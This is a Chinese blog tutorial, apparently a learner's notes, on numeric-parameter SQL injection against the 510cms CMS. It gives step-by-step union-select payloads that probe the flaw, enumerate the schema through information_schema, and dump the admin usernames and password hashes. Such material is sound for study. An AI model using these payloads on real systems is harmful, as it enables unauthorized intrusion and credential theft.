一、查找是否存在SQL注入;
查找的方法:
1、在存在 id 的后面 加 ' 看是否存在报错的结果;
2、用减法进行操作, id=27 --- id=28-1 显示的结果都一样;不能用 +
3、在id=27 后面加 and 1=1 两个结果都是真的,所以显示的内容 正常;
在id=27 后面加 and 1=2 前面的结果显示为真,后面的结果显示为假,所以最后显示的内容 不正常;
二、通过查找存在SQL注入,所以进行查找该网址的字段:
SQL命令:
在id=27 后面加 order by 1;
order by 2;
order by 3;
直到报错位置,如果在3时,报错,则有2个字段;
三、进行占位:
union联合查询中,前面的查询结果和后面的查询结果都为真的,则都会显示。如果前面的查询结果是假的,则只会显示后面的查询结果;
SQL命令:
在id=27 后加 and 1=2 union select 1,2,3,4
在网页上面会显示 3 ,则3就占位成功;
四、查询数据库:
SQL命令:
在id=27 后加 and 1=2 union select 1,2,database(),4
在网页上面就会显示数据库名称; 510cms
五、查询数据表:
SQL命令:
在id=27 后加 and 1=2 union select 1,2,TABLE_NAME,4 from information_schema.TABLES where TABLE_SCHEMA="510cms"
在网页上面就会显示数据表名称; 510_admin
六、查询数据列:(字段)
SQL命令:
在id=27 后加 and 1=2 union select 1,2,COLUMN_NAME,4 from information_schema.COLUMNS where TABLE_NAME="510_admin"LIMIT 2,1 --- (从0开始,记数,,,实则有4个字段(是从1开始记数)但是显示是按代码中的数列写0,1 - 1,1 - 2,1 后面是能是 1 否则显示不正常)
七、查询显示 账户,密码:
SQL命令:
在id=27 后加 and 1=2 union select 1,2,concat(name,passwd),4 from 510_admin
在网页显示 账号,密码(MD5 加密,H5 加密)
SQL注入(一):www.510cms.net --- 数字类型注入
猜你喜欢
转载自blog.csdn.net/weixin_45273343/article/details/102669131
今日推荐
周排行